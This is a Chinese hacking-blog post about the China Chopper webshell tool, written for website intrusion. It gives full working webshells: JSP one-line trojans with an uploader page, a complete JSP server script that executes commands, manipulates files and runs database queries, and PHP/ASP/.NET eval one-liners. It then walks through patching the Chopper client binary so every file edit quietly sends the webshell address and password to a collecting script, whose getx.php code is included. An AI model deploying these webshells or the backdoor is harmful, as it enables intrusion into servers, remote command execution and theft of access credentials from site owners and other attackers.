中国菜刀渗透工具,菜刀渗透教程

作者:hacker 分类:网站入侵 时间:2022-09-12 02:30:23 浏览:141

内容导读:导航目录:1、用中国菜刀连接一句话木马时为何会出现加载失败问题2、如何使用***P一句话木马和菜刀木马3、如何给中国菜刀添加隐蔽后门4、中国菜刀的功能介绍:用中国菜刀连接一句话木马时为何会出现加载失败问题刀菜需...……

导航目录:

用中国菜刀连接一句话木马时为何会出现加载失败问题

刀菜需要自己做变形,加载失败可能是服务器WAF拦截了,传统一句话优化看这:那些强悍的PHP一句话后门;推荐使用新技术:“冰蝎”动态二进制加密网站管理客户端,WebShell工具

如何使用 *** P一句话木马和菜刀木马

相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。

说了这么多废话,本文的目的是什么呢?其实只是想记录一下 *** P几种后门代码啦,因为曾经找 *** P菜刀马找的老辛苦了。

1、首先是 *** P一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)

以下是服务端,保存成one.jsp并上传至目标服务器中。

%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%

通过使用一句话木马客户端连接one.jsp木马。

将下列代码保存为html页面:

htmlheadtitle *** P一句话木马客户端/title/headdiv align=center font color=red专用 *** P木马连接器/fontbrform name=get method=post服务端地址input name=url size=110 type=text brbrtextarea name=t rows=20 cols=120你提交的代码/textareabr保存成的文件名:input name=f size=30 value=shell.jspinput type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交 /form br服务端代码:brtextarea rows=5 cols=120%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());% /textarea /div/body

保存完成后,打开html页面,写入一句话木马服务端地址,例如,写入需要的代码和保存的文件名称点击保存即可。

2、中国菜刀能用的菜刀马

本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。

将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。

%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%%!String Pwd="cto365.com";String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer *** )throws Exception{File r[]=File.listRoots();for(int i=0;ir.length;i++){ *** .append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer *** )throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;il.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){ *** .append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n");}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n";}} *** .append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;kx.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("-"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;id.length();i+=2){os.write((h.indexOf(d.charAt(i))4|h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;jz.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer *** )throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){ *** .append(l+"rn");}}void NN(String s,StringBuffer *** )throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();while(r.next()){ *** .append(r.getString(1)+"t");}r.close();c.close();}void OO(String s,StringBuffer *** )throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);while(r.next()){ *** .append(r.getString("TABLE_NAME")+"t");}r.close();c.close();}void PP(String s,StringBuffer *** )throws Exception{String[] x=s.trim().split("rn");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();for(int i=1;i=d.getColumnCount();i++){ *** .append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t");}r.close();m.close();c.close();}void *** (String cs,String s,String q,StringBuffer *** )throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i=n;i++){ *** .append(d.getColumnName(i)+"t|t");} *** .append("rn");while(r.next()){for(i=1;i=n;i++){ *** .append(EC(r.getString(i),cs)+"t|t");} *** .append("rn");}r.close();}catch(Exception e){ *** .append("Resultt|trn");try{m.executeUpdate(q); *** .append("Execute Successfully!t|trn");}catch(Exception ee){ *** .append(ee.toString()+"t|trn");}}m.close();c.close();}%%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer *** =new StringBuffer("");try{ *** .append("-"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent(); *** .append(s+"t");if(!s.substring(0,1).equals("/")){AA( *** );}}else if(Z.equals("B")){BB(z1, *** );}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){ *** .append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close(); *** .append("1");}else if(Z.equals("E")){EE(z1); *** .append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2); *** .append("1");}else if(Z.equals("H")){HH(z1,z2); *** .append("1");}else if(Z.equals("I")){II(z1,z2); *** .append("1");}else if(Z.equals("J")){JJ(z1); *** .append("1");}else if(Z.equals("K")){KK(z1,z2); *** .append("1");}else if(Z.equals("L")){LL(z1,z2); *** .append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(), *** );MM(p.getErrorStream(), *** );}else if(Z.equals("N")){NN(z1, *** );}else if(Z.equals("O")){OO(z1, *** );}else if(Z.equals("P")){PP(z1, *** );}else if(Z.equals("Q")){ *** (cs,z1,z2, *** );}}catch(Exception e){ *** .append("ERROR"+":// "+e.toString());} *** .append("|"+"-");out.print( *** .toString());%

如何给中国菜刀添加隐蔽后门

1、后门如何触发

这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。

当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图

当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。

2、菜刀脱壳

在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。

3、查看数据包,分析流程(右键-编辑)

本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,

数据如下

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数,

a url解码后为@eval (base64_decode($_POST[z0]));

z0先url解码,在base64解码为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();

Z1先url解码,在base64解码为

C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。

4、使用OD分析

使用OD打开中国菜刀,右键搜索字符串,结果如下:

定位到php读取文的字符串处,点击进去到代码处

可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。

5、修改菜刀程序文件

由上可知,字符串的地址为0x49ba94,查看内存数据,

发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。

这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0处

打开010editor 将上述字符串复制到010editor中,

由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,

保存文件,这样后门字符串就被我们添加到程序中了。

6、使用OD修改程序代码

用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。

7、测试修改结果

修改文件后,我们在看看菜刀-右键编辑,抓到数据包

Z0解密后为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果,

getx.php:

?php

$getx = $_GET["caidao"];

$file = fopen("getx.txt","a+");

fwrite($file,$getx);

fwrite($file,"\r\n");

fclose($file);

?

结果如下:

8、后记

通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。

中国菜刀的功能介绍:

只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。

UINCODE方式编译,支持多国语言输入显示。

一、EVAL客户端部分

1)要了解的

服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。

支持的服务端脚本:PHP, ASP,NET。

在服务端运行的代码如下:

PHP: ?php @eval($_POST['pass']);?

ASP: %eval request(pass)%

.NET: %@ Page Language=Jscript%%eval(Request.Item[pass],unsafe);%

(注意: .NET要单独一个文件或此文件也是Jscript语言)

2)怎么用

在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。

1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;

2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)

3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS

以入支持ADO方式连接的数据库。

(各种脚本条件下的数据库连接 *** 请点击数据库管理界面左上角处的配置按钮查看)

注意:由于服务器的安全设置,某些功能可能不能正常使用。

3) 关于配置信息怎么填?

A) 数据库方面:

PHP脚本:

T类型/T 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种

H主机地址H 主机地址可为机器名或IP地址,如localhost

U数据库用户/U 连接数据库的用户名,如root

P数据库密码/P 连接数据库的密码,如123455

ASP和.NET脚本:

T类型/T 类型只能填ADO

CADO配置信息/C

ADO连接各种数据库的方式不一样。如MSSQL的配置信息为

Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456

B) 其它方面:

添加额外附加提交的数据:应付这种情况:if ($_POST['action']=='test'){@eval($_POST['pass']);}

Oaction=test/O

提交功能前先POST额外的数据包:会话期间只提交一次。

DATAuid=user1pwd=123456/DATA

二、网站蜘蛛

织出一张网站的目录结构。

下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。

三、定时提醒

当闹钟事使吧, 周期:每月/每周/每日/只一次。

四、快速启动

一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。

五、浏览器

地址栏输入HELP,更多精彩后续加入。

六、其它部分

等待加入。

附带工具

update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。

把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb

把菜刀的数据库db.mdb替换掉即可。